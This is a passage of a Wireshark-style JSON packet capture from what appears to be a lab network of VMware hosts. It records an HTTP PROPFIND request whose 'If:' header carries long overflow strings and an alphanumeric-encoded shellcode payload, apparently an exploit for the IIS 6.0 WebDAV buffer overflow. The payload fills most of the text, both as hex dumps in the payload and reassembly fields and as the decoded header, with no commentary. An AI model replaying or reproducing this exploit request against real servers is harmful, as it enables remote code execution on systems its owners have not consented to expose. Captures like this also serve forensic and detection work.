ac:e6:ad:87:e7:91:9a:e4:a5:94:e7:a5:a4:e5:a1:b7:e6:99:96:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:79:57:52:79:44:53:4d:68:6b:53:6f:70:71:63:44:42:66:66:53:4f:49:63:50:61:46:4f:4f:67:49:6f:48:6e:6c:61:4b:54:48:41:6c:73:69:58:4b:4f:67:72:44:46:58:61:42:4a:4c:58:6e:65:53:45:75:71:7a:52:62:4f:56:79:72:77:67:78:77:4a:41:67:4e:67:50:50:53:68:47:49:6d:6e:67:42:56:62:6c:76:71:42:75:4a:6a:52:56:52:45:79:75:78:75:47:41:50:43:e4:91:a3:e7:a1:b6:e4:a5:96:e6:8d:aa:e6:9d:b3:e7:a9:91:e4:95:94:e7:a5:aa:e6:b5:b9:e5:89:b7:e5:99:85:e6:8d:97:e7:91:86:e5:81:8b:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:89:b2:e6:89:8e:e7:95:9a:e4:bd:ae:e1:8f:80:e6:a0:83:e4:b1:8e:e4:9d:b7:e6:a5:a3:e7:85:96:e6:91:a2:e4:a5:81:e4:9d:b7:e4:99:81:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/LdLdGcoHSYTktUkQPcMrbBxYefEmXFGWuhSgFRfjwDJiwqekPCgVuNhyQpWbXjYyHlvqURhkJHAJDZQwOSSVObDbMleIldtFNVAQNPhAPIo<49><6F><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/yWRyDSMhkSopqcDBffSOIcPaFOOgIoHnlaKTHAlsiXKOgrDFXaBJLXneSEuqzRbOVyrwgxwJAgNgPPShGImngBVblvqBuJjRVREyuxuGAPC<50><43><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "166"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.472174000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.472174000",
|
||
"frame.time_delta": "0.000083000",
|
||
"frame.time_delta_displayed": "0.007870000",
|
||
"frame.time_relative": "16.723114000",
|
||
"frame.number": "174",
|
||
"frame.len": "341",
|
||
"frame.cap_len": "341",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "327",
|
||
"ip.id": "0x00003d57",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000f2f2",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "39387",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "39387",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "38",
|
||
"tcp.len": "275",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1491935200",
|
||
"tcp.nxtseq": "1724",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1833797976",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000d8c0",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:ca:f7:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:ca:f7:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868279",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000440000",
|
||
"tcp.analysis.bytes_in_flight": "1723",
|
||
"tcp.analysis.push_bytes_sent": "1723"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001267000",
|
||
"tcp.time_delta": "0.000083000"
|
||
},
|
||
"tcp.payload": "69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "173",
|
||
"tcp.segment": "174",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1723",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:47:6f:67:4a:4b:66:47:4c:46:63:4b:75:61:77:66:77:6a:70:55:79:7a:7a:77:79:72:49:62:79:54:70:4a:6e:4c:4f:68:6e:50:4d:6f:4d:65:52:6d:51:65:78:44:77:4d:4a:6f:47:53:6e:6e:74:46:53:6b:44:75:44:4f:55:76:79:53:6f:65:79:41:73:64:78:43:53:73:6f:70:5a:41:51:65:68:63:43:59:45:4c:43:4b:47:6c:51:6c:4c:4c:73:58:4b:4e:78:65:53:58:41:e5:a1:a7:e6:85:99:e6:b1:b9:e4:ad:8a:e7:a5:88:e7:a5:85:e6:91:a1:e6:85:8a:e7:9d:9a:e5:95:b9:e6:85:b7:e5:89:ae:e4:b9:9a:e4:b1:b9:e5:a1:b2:e6:b5:83:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:b1:84:e4:91:a2:e5:81:b8:e5:9d:8e:e5:a9:84:e4:ad:b5:e4:89:b6:e7:99:8a:e6:b5:98:e5:89:87:e6:b1:ba:e7:a5:a5:e5:a1:85:e5:a1:81:e5:89:b6:e4:a1:b1:e4:95:a1:e6:95:8d:e6:8d:94:e6:bd:92:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:66:72:72:7a:43:74:52:4d:49:73:7a:7a:53:62:67:78:51:63:64:41:50:75:49:61:55:4e:55:42:52:62:67:76:6e:72:76:6c:67:76:79:53:77:45:47:57:4f:4c:53:55:59:4b:6e:77:43:45:49:46:50:48:62:73:43:69:43:73:73:44:4e:5a:78:73:63:6e:7a:62:4e:63:44:73:50:64:5a:6d:54:48:59:6f:58:48:6a:6e:78:6f:70:5a:6d:52:48:6d:6d:54:75:58:63:49:65:4c:e6:a9:b9:e4:91:8f:e4:8d:94:e6:85:a8:e5:a5:a9:e4:a5:aa:e6:a1:b2:e6:8d:b9:e5:a1:b8:e7:a5:95:e5:91:92:e5:a9:86:e5:85:89:e4:91:8c:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:95:b3:e7:a5:84:e6:bd:83:e4:b9:a4:e1:8f:80:e6:a0:83:e7:95:a6:e4:b9:a7:e5:85:b5:e6:a9:b7:e4:99:88:e7:9d:81:e4:b1:b3:e5:81:aa:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69